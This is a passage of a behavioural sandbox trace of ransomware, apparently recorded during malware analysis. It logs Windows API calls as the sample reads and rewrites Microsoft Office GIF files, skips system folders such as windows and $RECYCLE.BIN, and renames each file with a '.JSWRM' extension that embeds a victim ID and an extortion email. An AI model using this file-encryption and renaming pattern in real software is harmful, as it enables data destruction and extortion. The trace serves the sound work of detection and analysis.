office\\root\\office16\\1033\\pubspapr\\pdir36f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.412] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=36823) returned 1 [0119.412] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8fd0) returned 0x24e1d8 [0119.413] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x8fd0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x8fd0, lpOverlapped=0x0) returned 1 [0119.419] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.419] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x8fd0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x8fd0, lpOverlapped=0x0) returned 1 [0119.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.420] CloseHandle (hObject=0x314) returned 1 [0119.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0119.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0119.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0119.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0119.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0119.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0119.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.420] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR36F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir36f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR36F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir36f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0119.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0119.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0119.421] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad8b362, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad8b362, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad8b362, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd4a3, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR37F.GIF", cAlternateFileName="")) returned 1 [0119.421] lstrcmpiW (lpString1="PDIR37F.GIF", lpString2=".") returned 1 [0119.421] lstrcmpiW (lpString1="PDIR37F.GIF", lpString2="..") returned 1 [0119.421] lstrcmpiW (lpString1="PDIR37F.GIF", lpString2="...") returned 1 [0119.421] lstrcmpiW (lpString1="PDIR37F.GIF", lpString2="windows") returned -1 [0119.421] lstrcmpiW (lpString1="PDIR37F.GIF", lpString2="recovery") returned -1 [0119.421] lstrcmpiW (lpString1="PDIR37F.GIF", lpString2="perflogs") returned -1 [0119.421] lstrcmpiW (lpString1="PDIR37F.GIF", lpString2="documents and settings") returned 1 [0119.421] lstrcmpiW (lpString1="PDIR37F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.422] lstrcmpiW (lpString1="PDIR37F.GIF", lpString2="system volume information") returned -1 [0119.422] lstrcmpiW (lpString1="PDIR37F.GIF", lpString2="msocache") returned 1 [0119.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0119.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR37F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR37F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR37F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0119.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0119.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR37F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR37F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR37F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0119.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0119.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0119.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0119.422] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR37F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir37f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.423] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=54435) returned 1 [0119.423] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4a0) returned 0x24e1d8 [0119.423] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xd4a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0xd4a0, lpOverlapped=0x0) returned 1 [0119.427] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.427] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xd4a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0xd4a0, lpOverlapped=0x0) returned 1 [0119.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.428] CloseHandle (hObject=0x314) returned 1 [0119.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0119.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0119.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0119.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0119.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0119.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0119.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0119.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0119.428] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR37F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir37f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR37F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir37f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0119.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0119.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0119.429] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad65103, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad65103, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad8b362, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb819, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR38F.GIF", cAlternateFileName="")) returned 1 [0119.429] lstrcmpiW (lpString1="PDIR38F.GIF", lpString2=".") returned 1 [0119.429] lstrcmpiW (lpString1="PDIR38F.GIF", lpString2="..") returned 1 [0119.429] lstrcmpiW (lpString1="PDIR38F.GIF", lpString2="...") returned 1 [0119.429] lstrcmpiW (lpString1="PDIR38F.GIF", lpString2="windows") returned -1 [0119.429] lstrcmpiW (lpString1="PDIR38F.GIF", lpString2="recovery") returned -1 [0119.429] lstrcmpiW (lpString1="PDIR38F.GIF", lpString2="perflogs") returned -1 [0119.429] lstrcmpiW (lpString1="PDIR38F.GIF", lpString2="documents and settings") returned 1 [0119.429] lstrcmpiW (lpString1="PDIR38F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.429] lstrcmpiW (lpString1="PDIR38F.GIF", lpString2="system volume information") returned -1 [0119.429] lstrcmpiW (lpString1="PDIR38F.GIF", lpString2="msocache") returned 1 [0119.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0119.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR38F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR38F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR38F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0119.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0119.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR38F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR38F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR38F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0119.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0119.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0119.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0119.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR38F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir38f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.441] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=47129) returned 1 [0119.441] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb810) returned 0x24e1d8 [0119.441] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xb810, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0xb810, lpOverlapped=0x0) returned 1 [0119.463] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.463] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xb810, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0xb810, lpOverlapped=0x0) returned 1 [0119.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.463] CloseHandle (hObject=0x314) returned 1 [0119.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0119.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0119.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0119.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0119.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0119.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0119.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0119.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0119.464] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR38F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir38f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR38F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir38f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0119.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0119.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0119.465] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad8b362, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad8b362, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad8b362, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaf65, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR39F.GIF", cAlternateFileName="")) returned 1 [0119.465] lstrcmpiW (lpString1="PDIR39F.GIF", lpString2=".") returned 1 [0119.465] lstrcmpiW (lpString1="PDIR39F.GIF", lpString2="..") returned 1 [0119.465] lstrcmpiW (lpString1="PDIR39F.GIF", lpString2="...") returned 1 [0119.465] lstrcmpiW (lpString1="PDIR39F.GIF", lpString2="windows") returned -1 [0119.465] lstrcmpiW (lpString1="PDIR39F.GIF", lpString2="recovery") returned -1 [0119.466] lstrcmpiW (lpString1="PDIR39F.GIF", lpString2="perflogs") returned -1 [0119.466] lstrcmpiW (lpString1="PDIR39F.GIF", lpString2="documents and settings") returned 1 [0119.466] lstrcmpiW (lpString1="PDIR39F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.466] lstrcmpiW (lpString1="PDIR39F.GIF", lpString2="system volume information") returned -1 [0119.466] lstrcmpiW (lpString1="PDIR39F.GIF", lpString2="msocache") returned 1 [0119.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0119.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR39F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR39F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR39F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0119.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0119.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR39F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR39F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR39F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0119.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0119.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0119.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0119.466] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR39F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir39f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.467] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=44901) returned 1 [0119.467] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xaf60) returned 0x24e1d8 [0119.467] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xaf60, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0xaf60, lpOverlapped=0x0) returned 1 [0119.493] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.493] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xaf60, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0xaf60, lpOverlapped=0x0) returned 1 [0119.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.494] CloseHandle (hObject=0x314) returned 1 [0119.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0119.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 